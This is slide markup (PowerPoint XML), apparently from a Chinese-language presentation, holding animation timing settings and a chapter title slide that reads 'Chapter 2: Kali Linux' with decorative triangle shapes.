                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
